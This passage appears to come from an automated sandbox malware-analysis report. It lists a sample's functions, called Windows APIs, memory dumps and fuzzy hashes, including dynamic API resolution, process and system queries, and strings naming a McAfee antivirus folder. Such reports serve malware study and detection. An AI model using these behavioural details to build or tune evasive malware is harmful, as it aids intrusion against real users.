                                • Instruction ID: afe4a215af5e75f5bcbc76fdceaa7de5f17a671192b5524ebe786f8414be2f78
                                • Opcode Fuzzy Hash: d8bde64b67a0e67c27e30316ac598e1c67297a40a5b27b132b0e94f48ce3e6a8
                                • Instruction Fuzzy Hash: B0E0E5252043356AEB3126736C1CB5B76489B4ABA0F0512A3AD1496282DBBCCC0183ED
                                Function 00424CF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0040A088), ref: 00424D01
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InfoNativeSystem
                                • String ID:
                                • API String ID: 1721193555-0
                                • Opcode ID: d056cd09ade1b75375c985e3e9867a308bc472b29ce754fe8a4b8ebc8da1f5ab
                                • Instruction ID: 749b4d5a07bdd073ea54b677259e93ab06eaf1f88673129a773f6a235982741f
                                • Opcode Fuzzy Hash: d056cd09ade1b75375c985e3e9867a308bc472b29ce754fe8a4b8ebc8da1f5ab
                                • Instruction Fuzzy Hash: 31C09B7590410D97CB00E7E5D94988EB7FCA609204B400461D911E3140F671F95D8795
                                Function 003FB890 Relevance: 1.4, APIs: 1, Instructions: 173COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003FB7E0: FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,A05DD77D), ref: 003FB830
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0043C050,000000FF), ref: 003FBAC9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: 0d14172fe12f1e7c40e01c70737c15cd0bb5738b55280c739ef8c62129090080
                                • Instruction ID: 1e6a2c88d6d768fb835193bb855e87ed5723f23eb09df8104a97d25694f83234
                                • Opcode Fuzzy Hash: 0d14172fe12f1e7c40e01c70737c15cd0bb5738b55280c739ef8c62129090080
                                • Instruction Fuzzy Hash: 6D71B1B0D01359DBDB26DF15C849BA9F7B8AF44344F1441DADA48AB242E770AF84CF91
                                Function 0257D400 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3842594588.000000000257D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0257D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_257d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a35369969376b47e717fafb18f8c7de68a89c816908f7e4828000a81188059b8
                                • Instruction ID: 7bfb8b31fdf5c82c20ff0b2a83918e326a1fa921757880faeef47014a2473249
                                • Opcode Fuzzy Hash: a35369969376b47e717fafb18f8c7de68a89c816908f7e4828000a81188059b8
                                • Instruction Fuzzy Hash: F6210372544244DFDB18DF10E9C4B26BF76FF84314F24C5B9E9090B246C3B6E856CAA2
                                Function 0258D0DC Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e0702e681b9861feaf833a8066b6f5615769b7220dcf38ffc26075fc3e72db2
                                • Instruction ID: b68f05504c4eb4bcbcea6591989a85cf320223a6aad86634e933aaccbffa7deb
                                • Opcode Fuzzy Hash: 9e0702e681b9861feaf833a8066b6f5615769b7220dcf38ffc26075fc3e72db2
                                • Instruction Fuzzy Hash: B021F571504344DFEB04EF20D9C0B26BBB5FF88314F24C569D8095B2D6C7BAD846CA65
                                Function 0258D01C Relevance: .1, Instructions: 65COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d1afcc781a9a20e73cf7bbc6dd3a0ccad95a257044737484cebe8f1fea1cc3ff
                                • Instruction ID: 19bf394b19f83231955cd10979d68b22828b925f24e05ca2e78caef0a2817b00
                                • Opcode Fuzzy Hash: d1afcc781a9a20e73cf7bbc6dd3a0ccad95a257044737484cebe8f1fea1cc3ff
                                • Instruction Fuzzy Hash: 4F11E1B1A05344DFEB14FF34D984B36BBE5FB44204F208A69D40A5B2C1E3BAD446C666
                                Function 0257D3FB Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3842594588.000000000257D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0257D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_257d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e42ba21dd85538f86204e361e271b9c377ec2a0e9d4622c41ef75d55fb34e3d1
                                • Instruction ID: 9d63d3633e8e8088ee21eb2ad798e4ddd4feac97cadc57894db491ed08fc311d
                                • Opcode Fuzzy Hash: e42ba21dd85538f86204e361e271b9c377ec2a0e9d4622c41ef75d55fb34e3d1
                                • Instruction Fuzzy Hash: 5211E172404280CFCB15CF10E5C4B16BF72FF84324F24C1A9D8090B656C37AE456CBA1
                                Function 0258D006 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22d9767f7ba1f0a1249a8eae63377083295f748490133a4ba73ae3ceb724cb7c
                                • Instruction ID: 86d7f406d58170a11204f330c21c22a7959a0a39a131ea1c1124b3469f3527aa
                                • Opcode Fuzzy Hash: 22d9767f7ba1f0a1249a8eae63377083295f748490133a4ba73ae3ceb724cb7c
                                • Instruction Fuzzy Hash: 4C11B27150A3C4CFDB12EF34D594725BFB0FB42214F2885EAC4898B293D37A844AC762
                                Function 0258D0D7 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3843285956.000000000258D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_258d000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25fd3f2d3cf64367ab4aa6a3e4fd855283cda72dbe6d9a978ba3e59e4b138002
                                • Instruction ID: 2d76e3f9df07c4cf1f06749dc85ce1f3a317c56b36e7d9fe2e747a7d1562625e
                                • Opcode Fuzzy Hash: 25fd3f2d3cf64367ab4aa6a3e4fd855283cda72dbe6d9a978ba3e59e4b138002
                                • Instruction Fuzzy Hash: 78118B75504284DFDB05DF20D9C4B25BFB1FF88218F28C6AAD8494B696C37AD44ACBA1
                                Function 05450101 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849000279.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5450000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dac22bb97d797a7f5d4bbbb30819df5719b3a00245c57462d9f3f00461464311
                                • Instruction ID: c7dc535d8f32cfd4ab923ca47bebf0ec00104d34f085040d03a30d61a5dd7820
                                • Opcode Fuzzy Hash: dac22bb97d797a7f5d4bbbb30819df5719b3a00245c57462d9f3f00461464311
                                • Instruction Fuzzy Hash: 0EE0E26150E7C54FD3438B758C696903F309F27248B0E02EBD4C5CF1B3D6199909CB22
                                Function 05450120 Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849000279.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5450000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                • Instruction ID: 38f246181df111d5429a8bd68a772e0fce3d181c3253e5a9de7ce3dab65c4b62
                                • Opcode Fuzzy Hash: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                • Instruction Fuzzy Hash: F4B01230240208CFC300DB5DD445C003BFCAF49A0434000D0F1088B731C721FC008A40

                                Non-executed Functions

                                Function 0042536C Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00425372
                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00425380
                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00425391
                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004253A2
                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004253B3
                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004253C4
                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 004253D5
                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004253E6
                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 004253F7
                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00425408
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00425419
                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042542A
                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042543B
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042544C
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042545D
                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042546E
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042547F
                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00425490
                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 004254A1
                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 004254B2
                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 004254C3
                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004254D4
                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 004254E5
                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 004254F6
                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00425507
                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00425518
                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00425529
                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0042553A
                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0042554B
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0042555C
                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0042556D
                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0042557E
                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0042558F
                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 004255A0
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 004255B1
                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 004255C2
                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 004255D3
                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 004255E4
                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 004255F5
                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00425606
                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00425617
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                • API String ID: 667068680-295688737
                                • Opcode ID: 28bfbc9b6a4cedb49fd50eb8351245f9ce73a73b93f2b1927d936d966b5200fc
                                • Instruction ID: 1dfe0bd053739ca99ca312b497f2b597a75c313698eded26786c7510fa7ceb07
                                • Opcode Fuzzy Hash: 28bfbc9b6a4cedb49fd50eb8351245f9ce73a73b93f2b1927d936d966b5200fc
                                • Instruction Fuzzy Hash: ED61C079992310ABDB505FB4FC1EACD3AA8AA5B7423200977FA09D2171E7FC40948F5D
                                Function 00402C60 Relevance: 106.2, APIs: 70, Instructions: 1182libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00402D83
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402DC6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E07
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E48
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402E89
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402ECA
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F0B
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F4C
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402F8D
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00402FCE
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040300F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403050
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403091
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004030D2
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403113
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403154
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403195
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004031D6
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040321A
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040325B
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040329C
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004032DD
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040331E
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040335F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004033A0
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004033E1
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403422
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403463
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004034A7
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004034EB
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040352F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403573
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004035B7
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 004035FB
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 0040363F
                                • GetLastError.KERNEL32 ref: 0040368C
                                • GetLastError.KERNEL32 ref: 004036AE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 20e8b34668082c719bc70f61db2c35c8b582ebd7c62143e9f613d95d35a7b433
                                • Instruction ID: dd37ce1d7c22ac3c391c88d5f81df145b5bee8f538b7f835765fb104caeefadc
                                • Opcode Fuzzy Hash: 20e8b34668082c719bc70f61db2c35c8b582ebd7c62143e9f613d95d35a7b433
                                • Instruction Fuzzy Hash: 45B23574E04249AFDB05CFA8C4587AEBFF1AF89305F2480B9D815EB391DB799A40CB45
                                Function 00408870 Relevance: 36.4, APIs: 24, Instructions: 384libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000), ref: 0040889D
                                • GetProcAddress.KERNEL32(00000000), ref: 004088E1
                                • GetProcAddress.KERNEL32(00000000), ref: 00408925
                                • GetProcAddress.KERNEL32(00000000), ref: 00408969
                                • GetProcAddress.KERNEL32(00000000), ref: 004089AD
                                • GetProcAddress.KERNEL32(00000000), ref: 004089F1
                                • GetProcAddress.KERNEL32(00000000), ref: 00408A35
                                • GetProcAddress.KERNEL32(00000000), ref: 00408A79
                                • GetProcAddress.KERNEL32(00000000), ref: 00408ABD
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B01
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B45
                                • GetProcAddress.KERNEL32(00000000), ref: 00408B89
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00408869), ref: 00408BD8
                                • GetLastError.KERNEL32 ref: 00408BFC
                                • GetLastError.KERNEL32 ref: 00408C20
                                • GetLastError.KERNEL32 ref: 00408D40
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 1adffce1487e78720c765d71a8c581d577efc13abd2b886eede52aacb4c8d431
                                • Instruction ID: c8883a0721b3cc25db747a9587e6ca382898a03ed3db371592895f5c7f91c0d5
                                • Opcode Fuzzy Hash: 1adffce1487e78720c765d71a8c581d577efc13abd2b886eede52aacb4c8d431
                                • Instruction Fuzzy Hash: 5BF18F70E042499FDB05CBA8C9587AEBFF0AF45304F1480BED855E7391DFB98A449B4A
                                Function 00403B80 Relevance: 24.3, APIs: 16, Instructions: 291libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403BDA
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C1D
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C5E
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403C9F
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403CE0
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403D21
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403D62
                                • GetProcAddress.KERNEL32(00000000,0044CC40), ref: 00403DA3
                                • GetLastError.KERNEL32 ref: 00403DF0
                                • GetLastError.KERNEL32 ref: 00403E12
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$ErrorLast
                                • String ID:
                                • API String ID: 4214558900-0
                                • Opcode ID: 0be5edf2164177abd05aded27aead2eb1616ead2f83080db426ed3bcc5922c63
                                • Instruction ID: 8d46bfac799fa5dd1136b00e3de5451d4e1225cddf1ac0e51e89de3b4dacaf61
                                • Opcode Fuzzy Hash: 0be5edf2164177abd05aded27aead2eb1616ead2f83080db426ed3bcc5922c63
                                • Instruction Fuzzy Hash: 7FC14674E04249AFDB04CFA8C8587AEBFF1AF89305F1480BAD815E7381DB799A44CB55
                                Function 0040CB80 Relevance: 23.3, APIs: 6, Strings: 7, Instructions: 514nativememoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00425D49: RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D54
                                  • Part of subcall function 00425D49: RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D91
                                • NtQuerySystemInformation.NTDLL ref: 0040CC39
                                • SysAllocStringLen.OLEAUT32(av.cache.set,0000000C), ref: 0040D0ED
                                • GetCurrentProcessId.KERNEL32 ref: 0040D100
                                • GetLastError.KERNEL32 ref: 0040D135
                                • NtQueryInformationProcess.NTDLL ref: 0040D197
                                • CloseHandle.KERNEL32(?), ref: 0040D1D0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalInformationProcessQuerySection$AllocCloseCurrentEnterErrorHandleLastLeaveStringSystem
                                • String ID: C:\ProgramData$McAfee\WPS\content\av-trust$av.cache.set$gfff$`F$`F$`F
                                • API String ID: 3417838304-1905723352
                                • Opcode ID: e369764306d7ec5fcce8cb91f22b9e0fe9f0b5e0e7d819f7a3608364a3440ffe
                                • Instruction ID: 557801c9ed5a1b5dfbe99d658821c1afb5e5069ab4332f6818c706913a837c1b
